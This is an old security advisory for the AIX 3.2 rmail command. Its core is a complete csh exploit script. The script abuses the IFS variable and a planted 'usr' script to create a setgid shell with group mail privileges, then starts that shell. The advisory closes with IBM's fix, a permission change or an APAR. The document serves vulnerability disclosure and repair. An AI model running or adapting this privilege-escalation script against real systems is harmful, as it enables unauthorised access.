COMMAND

    rmail

SYSTEMS AFFECTED

    AIX 3.2


        #!/bin/csh
        #  IFS hole in AIX3.2 rmail gives egid=mail.  Apr. 1994

        mkdir /tmp/.rmail
        cd /tmp/.rmail

        cat << EOF > usr
        cp sh mailsh
        chmod 2777 mailsh
        EOF
        chmod 777 usr
        ln -s /bin/sh .

        setenv PATH .:$PATH
        setenv IFS /
        echo "cheezy mail hack" | rmail joeuser@nohost.com
        unsetenv IFS
        rm -f usr sh    #   minor cleanup.
        echo "Attempting to run sgid shell."
       ./mailsh

SOLUTION

    There are two possible solutions to this vulnerability. IBM  urges
    you to use the first solution since it is the quickest solution.

    1) As root, execute the following command:

           /usr/bin/chmod 555 /usr/bin/rmail /bin/rmail


    2) Apply the following APAR to your system once the APAR
       is available:

       APAR - IX57680